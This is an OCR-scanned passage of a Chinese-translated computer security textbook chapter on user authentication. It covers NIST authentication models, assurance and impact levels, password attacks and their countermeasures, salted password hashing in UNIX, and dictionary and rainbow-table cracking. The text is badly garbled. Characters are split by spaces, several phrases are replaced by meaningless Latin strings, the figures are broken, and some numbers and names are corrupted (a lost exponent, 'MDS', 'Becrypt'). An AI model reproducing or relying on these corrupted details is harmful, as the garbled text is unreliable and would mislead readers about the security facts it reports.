证 和 后 续 的 授权 亦 可 在 本 地 运行 ， 例 如 在 局 域 网 中 。 表 3-1 KA NIST SP 800-171 (在 非 联 邦 
信息 系统 和 组 织 中 保护 可 控 的 未 分 类 信息 ，2016 年 12 月 )， 提 供 了 一 个 识别 和 认证 服务 安全 
要 求 的 有 效 列表 。 


O 通常 , 口令 以 散 列 的 形式 存储 在 服务 器 端 ， 而 且 其 散 列 码 很 可 能 不 是 保密 的 。 本 章 随 后 会 讨论 这 部 分 内 容 。 
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表 3-1 识别 和 认证 安全 要 求 
基本 安全 要 求 
1 识别 信息 系统 用 户 ， 以 用 户 的 名 义 执行 的 进程 ， 或 设备 
2 认证 (authenticate)( 或 核实 (verify)) 这 些 用 户 、 进 程 或 设备 的 身份 ， 作 为 允许 访问 组 织 信息 系统 的 先决 条 件 
派生 的 安全 需求 
3 使 用 多 因素 身份 验证 进行 本 地 和 网 络 的 特权 账户 访问 ， 以 及 非特 权 账 户 的 网 络 访问 
4 对 特权 和 非特 权 账 户 的 网 络 访问 采用 防 重 放 认 证 机 制 
5 防止 在 定义 的 时 间 段 内 重用 标识 符 
6 在 确定 的 时 间 段 内 不 活动 后 禁用 标识 符 
7 在 创建 新 口令 时 强制 最 小 口令 复杂 上 度 并 更 改 字符 
8 禁止 在 规定 的 代 (generation) 数 内 重用 口令 
9 允许 临时 口令 用 于 系统 登录 ， 但 需 立 即 更 改 为 永久 口令 
10 仅仅 存储 和 传输 密码 保护 的 口令 
11 认证 信息 的 模糊 化 反馈 


3.1.1 数字 用 户 认 证 模型 


SP 800-63-3 定义 了 一 个 涉及 若干 实体 和 流程 的 用 户 认 证 模型 。 我 们 参照 图 3-1 来 讨论 这 
个 模型 。 





图 3-1 NIST SP 800-63-3 电子 认证 结构 模型 


认证 模型 首先 要 求 使 用 者 必须 在 该 系统 中 注册 。 下 面 是 一 个 典型 的 注册 流程 。 申 请 人 
问 注 册 中 心 ( Registration Authority, RA) 提交 申请 ， 成 为 一 个 证 书 服务 提供 商 〈 Credential 
Service Provider, CSP) 的 用 户 (subscriber)。 在 这 个 模型 中 ，RA 是 一 个 可 信 实 体 ， 它 建立 
申请 人 身份 并 为 之 回 CSP 提供 担保 。 之 后 ，CSP 与 用 户 进行 认证 信息 交换 ， 依 据 整 个 认证 
系统 的 具体 细节 ，CSP 可 将 某 种 电子 证 书 发 布 给 用 户 。 该 证 书 是 一 种 数据 结构 ， 它 将 身份 和 
某 些 附加 属性 绑 定 在 用 户 令 牌 上 进行 授权 。 而 且 ， 在 认证 事务 中 ， 证 书 的 提交 时 间 是 可 验证 
的 。 令 牌 被 用 于 唯一 地 识别 用 户 ， 它 可 以 是 一 个 加 密 密 钥 或 者 一 个 被 加 密 过 的 口令 。 令 有 牌 可 
以 由 CSP 发 布 ， 可 以 由 用 户 直 接生 成 ， 也 可 以 由 第 三 方 提供 。 令 牌 和 证 书 将 会 在 后 续 的 认证 
事件 中 使 用 。 

一 旦 一 个 使 用 者 注册 成 为 一 个 用 户 ， 那 么 在 用 户 与 某 些 系统 之 间 的 实际 认证 过 程 便 得 以 
进行 ， 系 统 功 能 包括 认证 和 后 续 的 授权 。 被 认证 的 团体 称 为 请 求 者 (claimant)， 而 进行 身份 
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验证 的 团体 被 称 为 验证 者 〈verifier)。 如 果 请 求 者 通过 认证 协议 回 验 证 者 证 明了 它 对 令 牌 的 擎 
控 ， 那 么 验证 者 即 可 验证 该 请 求 者 是 证 书 中 相应 的 用 户 。 验 证 者 将 一 个 关于 用 户 身 份 的 声明 
传递 给 依赖 方 (Relying Party，RP)。 声 明 包 括 用 户 的 身份 信息 ， 例 如 用 户 名 、 注 册 时 分 配 的 
ID， 或 用 户 的 其 他 验证 属性 。 利 用 验证 者 提供 的 认证 信息 ，RP 可 以 决定 各 种 访问 控制 和 授 
权 行 为 。 

当然 ， 一 个 实际 应 用 的 认证 系统 比 这 个 简单 模型 要 复杂 得 多 ,但 是 这 个 模型 描述 了 一 个 安 
全 认证 系统 要 求 的 各 个 关键 角色 和 功能 。 


3.1.2 ”认证 方法 


用 于 用 户 喘 份 认证 的 方法 一 般 有 四 种 ， 它 们 可 以 单独 使 用 也 可 以 组 合 起 来 使 用 : 
e 个 人 所 知道 的 信息 : 例子 包括 口令 、 个 人 标识 码 (Personal Identification Number, PIN) 
以 及 对 预先 设置 的 问题 的 答案 。 
个 人 所 持 有 的 物品 : PIT HISAR KE. AHEAD. APRA WEA E a ER 
为 令 牌 。 

© 个 人 的 生理 特征 (静态 生物 特征 ): 例子 包括 指纹 识别 、 虹 膜 识 别 及 人 脸 识 别 等 。 

© 个 人 的 行为 特征 (动态 生物 特征 ) : 例子 包括 通过 语音 模式 和 笔迹 特征 进行 的 识别 ， 以 

及 根据 打字 节奏 进行 的 识别 。 

尽管 所 有 的 这 些 方法 ， 在 合适 的 情况 下 都 可 以 给 用 户 提 供 安 全 的 认证 服务 。 然 而 ， 每 一 种 
认证 方法 都 存在 一 些 问 题 。 敌 手 可 以 猜测 或 者 盗 镭 用 户 的 口令 。 类 似 地 ， 敌 手 也 能 伪造 或 者 次 
取 令 牌 。 用 户 也 可 能 会 丢失 令 牌 或 者 忘记 口令 。 此 外 ， 系 统 对 口令 和 令 牌 信息 的 管理 和 对 其 保 
密 的 代价 也 不 能 被 忽视 。 至 于 使 用 生物 特征 进行 认证 ， 这 种 方法 也 存在 很 多 的 问题 ， 包 括 误 报 
和 漏 报 处 理 、 用 户 的 认可 程度 、 使 用 成 本 和 易 用 性 等 。 多 因素 认证 (multifactor authentication) 
指 的 是 在 之 前 的 列表 中 使 用 一 个 以 上 的 认证 方式 〈 见 图 3-2 )。 认 证 系统 的 强度 很 大 程度 上 由 系 
统 所 包含 的 因素 数量 决定 。 使 用 双 因 素 的 实现 被 认为 强 于 使 用 单 因 素 的 实现 ; 包含 三 因素 的 系 
统 强 于 仅 包 含 双 因素 的 系统 ， 等 等 。 


使 用 第 一 个 因素 使 用 第 二 个 因素 
的 认证 逻辑 的 认证 逻辑 
& 
F 
7, PTA y L me S e 
1) 





图 3-2 多 因素 认证 


3.1.3 ”用 尸 认 证 的 风险 评估 
全 面 的 安全 风险 评估 将 在 本 书 的 第 14 章 讨 论 。 本 节 中 ， 我 们 介绍 一 个 与 用 户 认证 相关 的 
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特殊 例子 。 这 里 有 三 个 独立 的 概念 : BSR. PEER A, FR TTA HE TRA 
起 来 。 
置信 等 级 ”置信 等 级 描述 了 组 织 对 以 下 事件 的 信任 程度 : 用 户 已 经 提交 了 一 个 关于 其 身份 
的 证 书 。 更 特殊 的 情况 下 ， 置 信 可 以 被 定义 为 : (1 ) 对 创建 个 体 身 份 的 审查 过 程 的 信任 程度 ， 
其 中 该 个 体 是 证 书 的 接收 者 ; (2) 对 证 书 使 用 者 即 证 书 接收 者 的 信任 程度 。SP 800-63-3 确认 
了 四 个 置信 等 级 : 
© 等 级 1 : 几乎 或 完全 不 信任 待 证 实 身份 的 合法 性 。 举 例 来 说 ， 该 等 级 适用 于 客户 在 一 
个 公司 网 站 的 讨论 版 里 注册 并 参与 讨论 的 情形 。 在 该 置信 等 级 下 ， 典 型 的 认证 技术 是 
事务 中 用 户 提 供 的 ID 和 口令 。 
© 等 级 2 : 部 分 信任 待 证 实 身份 的 合法 性 。 等 级 2 证书 适用 于 公开 的 大 范围 商务 活动 ， 
其 中 参与 活动 的 组 织 需 要 一 个 初始 的 身份 声明 (在 任何 行为 之 前 的 独立 验证 细节 )。 在 
该 置信 等 级 下 ,需要 使 用 到 某 种 安全 认证 协议 ， 以 及 某 种 之 前 总 结 过 或 接 下 来 将 要 讨 
论 的 认证 方法 。 
e 等 级 3: 高 度 信 任 待 证实 身份 的 合法 性 。 该 等 级 适用 于 授 子 客户 端 或 雇员 访问 高 级 (但 
不 是 最 高 级 ) 机 密 服务 器 的 权限 。 例 如 ， 专 利 律师 向 美国 专利 商标 局 提供 电子 版 专利 
证 书信 息 。 不 当 的 泄密 会 导致 竞争 对 手 获 利 。 在 该 置信 等 级 下 ， 认 证 技术 需要 涉及 多 
种 因素 ， 即 至 少 需要 使 用 到 两 种 相互 独立 的 认证 技术 。 
© 等 级 4 : 极其 高 度 地 信任 待 证 实 身份 的 合法 性 。 该 等 级 适用 于 授予 客户 端 或 雇员 访问 
极 高 级 机 密 服务 器 的 权限 ， 这 种 服务 器 一 旦 被 不 当 入 侵 即 会 遭受 极 大 的 损失 。 例 如 ， 
执法 官员 试图 访问 一 个 包含 犯罪 记录 的 法 制 数 据 库 。 未 经 允许 的 访问 可 能 引发 隐私 
问题 和 /或 妨碍 调查 。 一 般 情况 下 ， 在 等 级 4 下 需要 使 用 到 如 个 人 登记 一 样 的 多 因素 
认证 。 
潜在 影响 ”潜在 影响 是 一 个 与 置信 等 级 紧密 相关 的 概念 。FIPS 199 (联邦 信息 和 信息 系 
统 安全 分 类 标准 ，2004 年 2 月 ) 定义 了 在 安全 性 遭 到 破坏 (在 上 下 文中 一 般 指 用 户 认 证 失败 ) 
的 情况 下 ,个 体 或 者 组 织 受到 潜在 影响 的 三 个 等 级 : 
o 低 : 认证 错误 对 组 织 运作 、 组 织 资 产 及 个 人 造成 的 预期 不 良 影响 有 限 。 特 殊 情 况 下 ， 
可 以 认为 此 类 错误 是 :( 1 ) 致使 处 理 任务 的 能 力 降低 ， 且 在 此 期 间 组 织 能 行使 其 基本 
功能 ， 但 是 效率 降低 ; (2 ) 致使 组 织 设施 受到 轻微 的 损毁 ; (3 ) 致使 组 织 和 个 体 受到 
较 小 的 经 济 损失 ; (4 ) 致使 个 体 受 到 轻微 的 损害 。 
中 : 认证 错误 造成 的 预期 不 良 影 响 比 较 严 重 。 更 特殊 的 情况 下 ， 此 类 错误 可 能 是 : 
(1) 致使 处 理 任务 的 能 力 显 著 降低 ， 且 在 此 期 间 组 织 能 行使 其 基本 功能 ， 但 是 效率 显 
著 降 低 ; (2 ) 致使 组 织 设 施 受 到 显著 的 损毁 ; (3 ) 致使 组 织 和 个 体 受 到 显著 的 经 济 损 
Bes (4) 致使 个 体 受 到 显著 的 损害 ， 但 不 会 致命 。 
e 高 : 认证 错误 造成 的 预期 不 良 影 响 非 常 严重 ， 甚 至 是 灾难 性 的 。 此 类 错误 可 能 是 : 
(1) 致使 处 理 任务 的 能 力 严重 降低 或 完全 丧失 ， 且 在 此 期 间 组 织 无 法 行使 其 基本 功能 ; 
(2 ) 致使 组 织 设施 受到 大 规模 损毁 ; (3 ) 致使 组 织 和 个 体 受 到 大 规模 经 济 损失 ; 
(4 ) 致使 个 体 受 到 非常 严重 或 灾难 性 的 损害 ， 甚 至 致命 。 
风险 范围 ”在 潜在 影响 到 与 之 相对 应 的 置信 等 级 间 存 在 的 一 种 映射 关系 ， 且 该 映射 取决 于 
应 用 背景 。 对 于 组 织 可 能 遭受 的 种 种 风险 ， 表 3-2 给 出 了 一 个 可 能 的 映射 。 该 表 提 出 了 一 种 评 
估 风 险 的 手段 。 对 于 一 个 给 定 的 信息 系统 或 服务 器 设施 ， 如 果 有 认证 错误 发 生 ， 其 所 有 者 需要 
评定 其 所 受 影 响 的 等 级 ， 且 应 参考 相关 的 影响 类 别 或 风险 范围 。 
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表 3-2 各 置信 等 级 下 的 最 大 潜在 影响 


认证 错误 造成 的 潜在 影响 的 类 型 oat 
1 | 2 | a | 4 
对 地 位 或 声誉 造成 困扰 、 危 机 或 损毁 se 高 


例如 ， 某 处 出 现 一 个 认证 错误 而 导致 数据 库 被 非法 访问 ， 考 虑 这 种 情况 造成 的 潜在 经 济 损 
失 。 鉴 于 数据 库 的 固有 特性 ， 受 到 的 影响 可 能 为 : 

e 低 : 在 最 坏 情况 下 ， 任 何 团队 遭受 的 不 可 恢复 的 经 济 损 失 以 及 组 织 承 担 的 责任 都 是 微 

不 足 道 或 是 无 关 紧 要 的 。 
e 中 : 在 最 坏 情 况 下 ， 任 何 团队 遭受 的 不 可 恢复 的 经 济 损失 或 者 组 织 承担 的 责任 比较 严重 。 
。 高 : 在 最 坏 情 况 下 ， 任 何 团队 遭受 的 不 可 恢复 的 经 济 损失 或 者 组 织 承 担 的 责任 极其 严 
重 甚 至 是 灾难 性 的 。 

表 3-2 表明 ， 如 果 潜 在 影响 等 级 为 低 ， 那 么 置信 等 级 1 即 可 满足 要 求 。 如 果 潜 在 影响 等 级 
为 中 ,那么 置信 等 级 应 该 达到 2 或 者 3。 而 如 果 洪 在 影响 等 级 为 高 ， 那 么 置信 等 级 应 该 达到 4。 
类 似 的 分 析 可 以 运用 于 表 中 其 他 类 型 的 影响 。 在 分 析 之 后 ， 分 析 人 士 得 以 选取 一 个 置信 等 级 
该 置信 等 级 能 够 达到 或 高 于 表 中 各 影响 类 型 的 置信 需求 。 这 样 ， 对 于 一 个 系统 而 言 ， 如 果 任 何 
影响 类 型 均 具 有 高 等 级 的 潜在 影响 ， 或 者 在 个 人 安全 方面 具有 中 高 等 级 的 潜在 影响 ， 那 么 应 该 
使 用 置信 等 级 4。 


3.2 基于 口令 的 认证 


对 于 抵御 入 侵 者 ， 口 令 系统 是 应 用 最 广泛 的 防范 手段 。 所 有 的 多 用 户 操 作 系 统 、 网 络 服务 
a. ÆT Web 服务 的 电子 商务 网 站 以 及 其 他 类 似 的 系统 ， 不 仅 要 求 用 户 提 供用 户 名 或 标识 符 
(ID)， 还 要 求 提供 口令 。 系 统 将 该 口令 与 以 前 保存 的 该 用 户 ID 的 口令 进行 比较 。 口 令 的 作用 
就 是 对 登录 到 系统 上 的 用 户 ID 进行 认证 。 反 过 来 , 用 户 ID 通过 以 下 几 种 方法 来 保证 安全 性 : 
e HP ID 决定 了 用 户 是 否 被 授权 访问 系统 。 在 某 些 系统 中 ， 不 允许 匿名 登录 ， 只 有 在 系 
统 中 已 具有 ID 的 用 户 才 能 对 系统 进行 访问 。 

e 用 户 ID 决定 了 该 用 户 所 拥有 的 访问 权限 。 一 些 用 户 可 能 会 拥有 “超级 用 户 ” 的 权限 ， 
可 以 读 取 被 操作 系统 特别 保护 的 文件 ， 执 行 被 操作 系统 特别 保护 的 功能 。 某 些 系统 中 
定义 了 guest 账户 或 者 匿名 账户 ， 这 些 账户 的 用 户 比 其 他 级 别 的 用 户 拥 有 更 少 的 权限 。 

e HHP ID 还 可 应 用 在 目 主 访问 控制 机 制 中 。 例 如 ， 一 个 用 户 如 果 可 以 列 出 其 他 用 户 的 

ID， 那么 他 就 可 以 授权 这 些 用 户 读 取 他 所 拥有 的 文件 。 


3.2.1 口令 的 脆弱 性 


在 本 小 节 中 ， 我 们 概述 对 基于 口令 的 认证 的 攻击 的 主要 形式 ， 并 简要 地 介绍 相应 的 对 策 。 
通常 ,一 个 基于 口令 认证 的 系统 中 ， 都 会 维护 着 一 个 以 用 户 ID 作为 索引 的 口令 文件 。 在 
随后 的 内 容 中 ， 我 们 将 会 介绍 一 种 并 不 对 口令 进行 存储 而 是 对 口令 的 单 向 散 列 函数 值 进行 存储 
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的 典型 应 用 技术 。 
下 面 是 一 些 口 令 攻 击 策略 以 及 针对 这 些 攻 击 的 对 策 : 


BAS AWE (offline dictionary attack): 通常 ， 保 护 系统 中 的 口令 文件 要 使 用 强 访问 控制 
策略 。 但 是 经 验 表明 ， 有 坚定 信心 的 黑客 总 是 可 以 绕 过 访问 控制 机 制 获得 口令 文件 的 访 
问 权 。 攻 击 者 获取 到 系统 的 口令 文件 并 将 其 中 的 口令 散 列 值 与 通常 所 用 口令 的 散 列 值 进 
行 比 较 。 如 果 找 到 了 相 匹 配 的 结果 ， 那 么 攻击 者 就 可 以 通过 用 户 ID 和 口令 的 组 合 获得 
访问 权 。 对 付 此 类 攻击 有 如 下 几 种 措施 : 防止 非 授权 访问 口令 文件 ; 使 用 入 侵 检 测 技术 
对 危及 安全 的 行为 进行 识别 ; 尽快 对 口令 文件 中 的 不 安全 口令 进行 重新 设置 等 。 

特定 账户 攻击 ( specific account attack): 攻击 者 把 目标 锁定 为 特定 用 户 ， 并 不 断 地 猜测 
口令 ， 直 至 发 现 正确 的 口令 。 对 抗 这 种 攻击 的 标准 方法 是 使 用 账户 锁定 机 制 ， 当 登录 
失败 的 次 数 超过 一 定数 量 时 就 会 将 用 户 锁 定 。 典 型 的 实践 方法 就 是 设置 不 超过 五 次 的 
登录 尝试 次 数 。 

常用 口令 攻击 ( popular password attack): 上 述 攻击 的 一 个 变 体 就 是 用 一 个 常用 口令 对 
大 量 的 用 户 ID 进行 尝试 。 通 常用 户 会 倾向 于 选择 一 个 容易 记忆 的 口令 ， 这 就 使 得 口令 
很 容易 被 猜 出 。 对 抗 这 种 攻击 的 方法 包括 禁止 用 户 选择 常用 的 口令 ， 对 认证 请 求 者 的 
IP 地址 和 用 户 提交 模式 的 cookie 进行 扫描 。 

单 用 户口 令 猜 测 (password guessing against single user) : 攻击 者 试图 获得 账户 拥有 者 信 
息 和 系统 口令 保护 策略 ， 并 使 用 这 些 信息 来 猜测 用 户口 令 。 对 抗 这 种 口令 猜测 的 方法 ， 
包括 训练 并 加 强 口 令 保 护 策略 以 使 口令 难于 猜测 。 这 些 策略 涉及 保密 、 口 令 的 最 小 长 
度 、 字 符 集 、 禁 止 使 用 常用 用 户 ID 、 更 换 口 令 的 时 间 长 度 等 内 容 。 

工作 站 支持 ( workstation hijacking): 攻击 者 确认 工作 站 管理 员 已 经 登录 ， 在 管理 员 不 注 
意 的 情况 下 进行 人 侵 ， 并 占领 工作 站 。 对 抗 此 类 攻击 的 标准 方法 是 ， 在 工作 站 处 于 非 活 
动 状态 时 采用 自动 注销 的 机 制 ， 同 时 也 可 以 使 用 入 侵 检测 方案 对 用 户 行为 的 变化 进行 检测 。 
AARAA pta (exploiting user mistake): 如 果 是 由 系统 分 配 口令 ， 那 么 用 户 通 常会 把 分 
配 的 口令 记录 下 来 ， 因 为 它 很 难 记 忆 。 这 种 情况 使 得 攻击 者 有 机 会 读 到 记录 下 来 的 口 
令 。 例 如 ， 用 户 可 能 会 为 了 共享 文件 而 把 口令 告诉 自己 的 同事 。 此 外 ， 通 过 社会 工程 
学 策略 来 欺骗 用 户 或 账户 管理 者 使 其 泄露 口令 ,使 用 这 种 方法 攻击 者 常常 能 够 成 功 获 
得 口令 。 很 多 计算 机 系统 给 系统 管理 员 预 设 口 令 ， 除 非 这 种 预 设 口 令 被 改变 ， 否 则 这 
些 口 令 将 会 很 容易 被 猪 到 。 对 应 的 解决 方法 包括 用 户 培 训 、 入 侵 检 测 、 使 用 口令 与 其 
他 认证 机 制 的 组 合 认 证 等 。 

口令 重复 利用 (exploiting multiple password use): 如 果 一 个 指定 用 户 对 不 同 的 网 络 设备 
使 用 相同 或 相近 的 口令 ， 那么 攻击 就 会 变 得 效率 很 高 ， 破 坏 性 很 强 。 对 应 的 解决 方法 
是 禁止 为 特定 的 网 络 设备 设置 相同 或 相近 的 口令 。 

电子 监视 (electronic monitoring): 如 果 用 户 需 要 通过 网 络 来 登录 远程 的 系统 ， 那 么 就 
有 被 穷 听 的 危险 。 简 单 的 加 密 并 不 能 解决 此 类 问题 ， 因 为 加 密 的 口令 本 质 上 还 是 口令 ， 
可 能 会 被 攻击 者 观测 到 并 再 次 使 用 。 


无 论 口令 存在 多 少 安全 方面 的 脆弱 性 ， 它 依然 是 最 通用 的 用 户 认证 技术 ， 且 这 种 现状 在 将 
来 也 不 易 改 变 [HERL12]。 口 令 仍 将 继续 流行 下 去 的 原因 如 以 下 几 条 : 

1. 指纹 扫描 和 智能 卡 读 取 等 技术 依赖 于 客户 端 硬件 ， 需 要 在 客户 妆 和 服务 器 系统 上 均 实 现 
相应 的 用 户 认证 软件 。 对 于 客户 端 和 服务 器 系统 而 言 ， 在 其 中 一 端 被 广泛 接受 之 前 ， 另 一 端的 
实现 必然 受到 阻碍 ， 因 而 会 陷 人 一 个 “ 谁 先行 ”的 僵局 。 

2. 智能 卡 等 物理 令 牌 价格 昂贵 且 不 便携 ， 尤 其 当 需 要 使 用 多 个 令 牌 时 。 
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3. 使 用 本 章 中 提 及 的 无 口令 技术 实现 基于 单一 登录 多 服务 的 方案 ， 会 产生 单一 的 安全 风险 。 

4. 自动 口令 管理 程序 用 于 缓解 用 户 记 忆 和 输入 口令 的 负担 ， 而 它 对 多 客户 平台 间 的 漫游 和 
同步 的 支持 不 足 ， 其 用 途 尚 竺 被 充分 开发 。 

因此 ,口令 在 用 户 认证 方面 值得 我 们 继续 深入 人 研究。 


3.2.2 ” 散 列 口令 的 使 用 


口令 安全 技术 广泛 使 用 了 散 列 函数 和 “ 盐 值 ”。 这 种 策略 实际 上 在 所 有 UNIX 变 体 及 
其 他 操作 系统 上 都 在 使 用 ， 如 图 3-3a 所 表示 的 过 程 。 为 了 加 载 系统 设置 的 一 个 新 口令 ， 用 
户 需要 选择 或 被 分 配 一 个 口令 。 这 个 口令 与 一 个 固定 长 度 的 “ 盐 值 ”( salt value) 组 合 起 来 
[MORR79]。 在 较 早 期 的 实现 中 ,“ 盐 值 ” 和 分 配 用 户口 令 的 时 间 相 关 。 在 较 新 一 些 的 实现 中 ， 
则 使 用 了 伪 随 机 数 或 者 随机 数 。 口 令 和 “ 盐 值 ”将 作为 散 列 算法 的 输入 数据 ， 最 终 将 生成 一 个 
定 长 的 散 列 码 。 散 列 算 法 的 设计 就 是 为 了 通过 减 慢 执行 而 阻止 攻击 的 发 生 。 散 列 编码 后 的 口令 
将 和 “ 盐 值 ”的 明文 拷贝 一 起 保存 在 相应 用 户 的 口令 文件 中 。 这 种 散 列 口令 的 方法 被 用 来 对 抗 
多 种 密码 分 析 攻 击 方法 [WAGN00]， 以 保证 系统 安全 。 

当 用 户 试图 登录 到 一 个 UNIX 系统 时 ， 用 户 将 提供 ID 和 口令 ， 如 图 3-3b 所 示 。 操 作 系 统 
用 ID 检索 口令 文件 ,来 获得 “ 盐 值 ”的 明文 数据 以 及 经 过 加 密 的 口令 。“ 盐 值 ” 和 用 户 提供 的 
口令 将 被 作为 输入 数据 进行 加 密 运 算 。 如 果 得 出 的 结果 和 口令 文件 中 存放 的 加 密 口 令 相 匹配 ， 
那么 用 户 提供 的 口令 就 会 被 系统 接受 。 

口令 文件 

用 户 ID 用 户 ID 盐 值 散 列 码 








散 列 口令 
a) 加 载 新 口令 b) 验证 口令 
K| 3-3 UNIX 口令 方案 


使 用 “ 盐 值 ”的 三 个 目的 是 : 
e 它 可 以 防止 复制 的 口令 在 口令 文件 中 可 见 。 即 使 是 两 个 不 同 的 用 户 选择 了 相同 的 口令 ， 
这 些 口 令 也 会 被 分 配 不 同 的 “ 盐 值 ” 。 因 此 ， 这 两 个 用 户 所 拥有 的 散 列 口令 是 不 同 的 。 
® 它 显 著 地 增加 了 离线 口令 字典 攻击 的 难度 。 对 于 一 个 5 位 长 度 的 “ 盐 值 "， 可 能 产生 的 
口令 数量 将 会 增长 2 倍 ， 这 将 大 大 增加 通过 字典 攻击 来 猜测 口令 的 难度 。 
© 它 使 得 攻击 者 几乎 不 可 能 发 现 一 个 用 户 是 否 在 两 个 或 更 多 的 系统 中 使 用 了 相同 的 口令 。 
为 了 说 明 第 二 点 ， 考 虑 离线 字典 攻击 的 攻击 方式 。 攻 击 者 获得 一 份 口令 文件 的 拷贝 ， 假 定 
不 使 用 “ 盐 值 ”， 那 么 攻击 者 的 目标 仅仅 是 猜测 口令 。 为 了 猜测 口令 ,攻击 者 只 需要 提交 大 量 
的 可 能 的 口令 给 散 列 函数 ， 如 果 这 些 猜测 口令 中 有 一 个 是 与 文件 中 的 散 列 口令 匹配 的 ， 那么 攻 
击 者 就 找到 了 口令 文件 中 的 一 个 口令 。 但 是 对 于 UNIX 操作 系统 机 制 ， 攻 击 者 除了 必须 要 提供 
一 个 猜测 的 口令 进行 散 列 运算 外 ， 还 要 考虑 字典 文件 中 每 一 个 “ 盐 值 ”， 这 就 使 得 需要 检查 的 
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猜测 的 次 数 大 大 增加 。 

对 于 UNIX 操作 系统 口令 方案 ， 仍 然 有 两 种 威胁 存在 。 首 先 ， 在 某 台 机 器 上 用 户 可 以 通过 
guest 账户 或 其 他 方法 获得 系统 的 访问 权 ， 然 后 运行 口令 猜测 程序 ， 该 程序 称 为 口令 破解 器 。 
在 消耗 很 少 的 资源 的 情况 下 ， 攻 击 者 就 能 够 检查 成 千 上 万 个 可 能 的 口令 。 其 次 ， 如 果 攻 击 者 能 
够 得 到 一 份 口令 文件 的 拷贝 ， 那 么 这 个 攻击 者 也 可 能 会 在 男 一 台 计 算 机 上 运行 口令 破解 程序 。 
这 使 得 攻击 者 可 以 在 合理 的 时 间 内 完成 上 百 万 次 的 口令 猜测 。 

UNIX 实现 A UNIX 的 最 初版 本 起 ， 大 多 数 实 现 都 依赖 于 以 下 的 口令 策略 : 每 个 用 户 
选择 一 个 长 度 至 多 为 八 个 可 打印 字符 的 口令 。 该 口令 将 被 转化 为 一 个 56 位 的 数值 (使 用 7 位 
ASCII 码 )， 作 为 加 密 例 程 的 输入 密 钥 。 这 个 散 列 例 程 就 是 crypt(3)， 基 于 DES 算法 ， 且 使 用 
12 位 的 “ 盐 值 ”。 这 种 经 过 修改 的 DES 算法 要 求 输入 一 个 64 位 全 0 数据 块 ， 算 法 的 输出 作为 
下 一 次 加 密 的 输入 。 整 个 加 密 过 程 共 重复 25 次 ， 最 后 得 出 的 64 位 输出 结果 被 转化 成 由 11 个 
字符 组 成 的 字符 序列 。 改 进 的 DES 算法 会 把 它 转 化 为 一 个 单 向 的 散 列 函数 。crypt(3) 例 程 被 设 
计 用 来 防止 口令 猜测 攻击 。DES 加 密 算 法 的 软件 实现 比 硬件 实现 要 慢 ， 经 过 25 轮 迭 代 所 消耗 
的 时 间 是 完成 一 次 口令 运算 的 25 倍 。 

这 种 加 密实 现 现 在 被 认为 是 不 适用 的 。 例 如 ，[PERR03] 报告 了 利用 超级 计算 机 进行 字典 
攻击 的 结果 。 攻 击 者 可 以 在 80 分 钟 内 完成 五 千 万 次 口令 猜测 。 此 外 ， 该 结果 还 显示 ， 如 果 有 
人 能 用 单 处 理 器 计算 机 在 几 个 月 之 内 完成 相同 的 工作 ， 将 会 被 奖励 一 万 美元 。 尽 管 存在 明显 的 
弱点 ， 但 这 种 UNIX 口令 方案 仍然 有 存在 的 必要 ， 以 便 兼容 已 有 的 财务 管理 软件 或 者 在 多 厂商 
的 环境 下 使 用 。 

还 有 其 他 更 强大 的 散 列 /“ 盐 值 ”方案 适用 于 UNIX 操作 系统 。 这 里 推荐 一 种 基于 MDS 的 
散 列 函数 (类 似 于 SHA-1， 但 安全 性 较 SHA-1 要 弱 )， 它 适用 于 很 多 UNIX 系统 ， 包 括 Linux, 
Solaris 和 FreeBSD 等 。 这 种 MD5 加 密 方案 使 用 一 个 48 位 的 随机 值 ， 并 对 口令 长 度 没有 限制 。 
它 可 以 产生 一 个 128 位 的 散 列 值 ， 这 种 方法 比 crypt(3) 要 慢 得 多 。 为 了 实现 减速 ，MD5 加 密 技 
术 使 用 具有 1000 次 迭代 的 内 部 循环 。 

最 安全 的 UNIX 散 列 /“ 盐 值 ” 方 案 可 能 是 为 另 一 种 广泛 使 用 的 开源 UNIX 一 一 OpenBSD 
开发 的 方案 。[PROV99] 报告 显示 ， 这 种 方案 使 用 了 基于 Blowfish 对 称 分 组 密码 的 散 列 函数 。 
该 散 列 函数 被 称 为 Becrypt， 其 实现 起 来 速度 更 慢 。Bcrypt 运行 设置 的 口令 长 度 最 多 55 个 字符 ， 
并 要 求 使 用 一 个 128 位 的 随机 “ 盐 值 ” 来 产生 一 个 192 位 的 散 列 值 。Berypt 还 包括 一 个 代价 变 
量 ， 代 价 变量 的 增加 会 导致 执行 Berypt 散 列 运算 花费 的 时 间 增 加 。 在 设置 一 个 新 口令 时 ， 也 
要 指派 一 个 代价 变量 ， 所 以 系统 管理 员 可 以 为 特权 用 户 分 配 一 个 较 高 的 代价 变量 。 


3.2.3 ”破解 “用 户 选 择 ” 口 令 


传统 方法 “传统 的 口令 猜测 或 者 口令 破解 方法 ， 就 是 开发 一 个 庞大 的 口令 字典 并 使 用 其 
中 的 每 个 口令 对 口令 文件 进行 尝试 。 这 种 方法 通过 对 口令 文件 中 每 一 个 口令 使 用 “ 盐 值 ”来 进 
行 散 列 运算 ， 并 和 口令 文件 中 存储 的 散 列 值 进行 比较 。 如 果 没 有 发 现 相 匹配 的 口令 ， 那 么 破解 
程序 将 会 尝试 去 改变 口令 字典 中 相似 的 口令 。 对 口令 字典 做 的 变换 包括 倒置 拼写 ， 添 加 特殊 字 
符 、 字 符 串 或 数字 等 。 

另外 一 种 口令 破解 的 手段 是 预计 算 潜在 的 散 列 值 ， 以 空间 代价 来 换取 时 间 人 代价。 在 这 种 
方法 中 ,攻击 者 会 产生 出 一 个 包括 所 有 可 能 口令 的 较 大 的 口令 字典 。 对 于 口令 字典 中 的 每 个 
口令 ， 攻 击 者 都 要 根据 可 能 的 “ 盐 值 ”进行 散 列 运算 。 产 生 的 结果 是 一 个 巨大 的 散 列 值 表 ， 
被 称 为 彩虹 表 (rainbow table)。 例 如 ，[OECH03] 显示 了 使 用 1.4GB 的 数据 能 够 在 13.8 秒 内 
破解 99.9% 的 完全 由 字母 和 数字 组 成 的 Windows 口令 的 散 列 值 。 针 对 这 种 攻击 方法 ， 可 以 


LI] 
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通过 设置 足够 大 的 “ 盐 值 ”以 及 设置 较 长 的 散 列 值 来 进行 对 抗 。 在 不 和 久 的 将 来 ，FreeBSD 和 
OpenBSD 系统 都 应 该 能 够 克服 这 种 攻击 囊 来 的 安全 威胁 。 

为 了 应 对 足够 大 的 “ 盐 值 ”和 散 列 长 度 ， 攻 击 者 发 现 了 这 样 的 事实 : 某 些 用 户 设置 了 简单 
